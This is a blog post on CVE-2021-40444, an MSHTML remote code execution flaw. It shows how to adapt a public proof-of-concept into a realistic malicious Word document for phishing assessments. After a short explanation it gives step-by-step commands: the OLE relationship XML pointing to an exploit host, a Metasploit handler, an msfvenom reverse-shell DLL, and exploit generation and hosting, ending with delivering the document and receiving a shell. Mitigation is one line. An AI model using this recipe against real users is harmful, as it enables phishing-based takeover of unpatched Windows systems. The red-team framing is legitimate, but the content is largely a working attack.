CVE-2021-40444 - MSHTML RCE - Generate document for fishing assessment
Today we’ll talk about a Microsoft MSHTML Remote Code Execution Vulnerability and how to generate your own documents for fishing assessments.
Here is a list of subtopics of this post:
- Vulnerability summary
- How does the vulnerability work?
- Are there public exploits?
- How to use your own template?
- Mitigate
- Sources
Vulnerability summary
| Chronology | 7th September 2021 – warning from Microsoft, 14th September 2021 - patch |
| Vulnerable OS versions | Windows 8.1-10, Windows Server 2008-2019 |
| Affected products | MSHTML, ActiveX, Office |
| Impact | RCE via Social Engineering |
How does the vulnerability work?
Attackers exploit CVE-2021-40444 using specially crafted Microsoft Office documents.
Such a document uses the MSHTML mechanism to open a malicious website hosted on an attacker-controlled endpoint. Link to this website exists as an Object Linking and Embedding (OLE) MIME HTML (MHTML) object in the context of a document. The website executes JavaScript code and ActiveX controls, which then run malicious code on the system on which the malicious Office document was opened. This code is hosted on an attacker-controlled endpoint in the form of a dynamic link library (DLL).
Are there public exploits?
There is a publicly available exploit, which generates documents:
CVE-2021-40444 POC by lockedbyte
The generated document looks like this:
But in phishing assessments, we will need a more detailed and realistically looking layout.
How to use your own template?
Initially, we would need the exploit from GitHub and our document, which we will use as a template.
1.Move existing template in exploit into another folder
cp -r CVE-2021-40444/data/word_dat/ CVE-2021-40444/data/word_dat_orig2.Unzip your document, replacing template folder in exploit directory
unzip -o <your doc name> -d CVE-2021-40444/data/word_dat3.From original CVE-2021-40444/data/word_dat_orig/word/_rels/document.xml.rels copy strings below into CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels, increasing or decreasing rId according to your document content:
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>" TargetMode="External"/>
<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/>»4.From CVE-2021-40444/data/word_dat_orig/word/document.xml, copy the block containing rId6 and rId5 to CVE-2021-40444/data/word_dat/word/document.xml. A similar block is below. Replace rId with yours from the previous step.
<w:p w14:paraId="720AA3DA" w14:textId="6089DC1A" w:rsidR="00642844" w:rsidRDefault="007E0FA4">
<w:pPr>
<w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto" />
<w:rPr>
<w:sz w:val="30" />
<w:szCs w:val="30" />
</w:rPr>
</w:pPr>
<w:r>
<w:rPr>
<w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" />
<w:b />
<w:sz w:val="30" />
<w:szCs w:val="30" />
<w:u w:val="single" />
<w:lang w:eastAsia="en-GB" />
</w:rPr>
<w:t />
</w:r>
<w:bookmarkStart w:id="0" w:name="_GoBack" />
<w:r>
<w:rPr>
<w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" />
<w:b />
<w:sz w:val="30" />
<w:szCs w:val="30" />
<w:u w:val="single" />
<w:lang w:eastAsia="en-GB" />
</w:rPr>
<w:object w:dxaOrig="4320" w:dyaOrig="4320" w14:anchorId="0457A93C">
<v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter" />
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0" />
<v:f eqn="sum @0 1 0" />
<v:f eqn="sum 0 0 @1" />
<v:f eqn="prod @2 1 2" />
<v:f eqn="prod @3 21600 pixelWidth" />
<v:f eqn="prod @3 21600 pixelHeight" />
<v:f eqn="sum @0 0 1" />
<v:f eqn="prod @6 1 2" />
<v:f eqn="prod @7 21600 pixelWidth" />
<v:f eqn="sum @8 21600 0" />
<v:f eqn="prod @7 21600 pixelHeight" />
<v:f eqn="sum @10 21600 0" />
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect" />
<o:lock v:ext="edit" aspectratio="t" />
</v:shapetype>
<v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:3.75pt;height:3.75pt" o:ole="">
<v:imagedata r:id="rId5" o:title="" cropbottom="64444f" cropright="64444f" />
</v:shape>
<o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId6" UpdateMode="OnCall">
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>
</o:OLEObject>
</w:object>
</w:r>
<w:bookmarkEnd w:id="0" />
</w:p>5.Create listener
msfconsole use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <>
set lport <>
run6.Generate .dll using msfvenom and place into directory CVE-2021-40444/test
msfvenom -p windows/meterpreter/reverse_tcp lhost=<> lport=<> -f dll > CVE-2021-40444/test/shell.dll7.Generate your malicious document with exploit
python3 exploit.py generate test/shell.dll http://<attacker ip>8.Use the exploit to open the http server hosting the html file
python3 exploit.py host 809.Deliver document on your target machine.
10.Open document and receive shell
Mitigate
Install patch September’s patches.
That’s it. Stay safe and Happy Hacking!
Check out the list of sources for additional information
Sources
- Microsoft release on CVE-2021-40444
- “Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs” by TrendMicro
- “Cybersecurity Advisory: Hackers Are Exploiting CVE-2021-40444” by Huntress
- “THREAT ALERT: Microsoft MSHTML Remote Code Execution Vulnerability” by Cybereason Global SOC Team
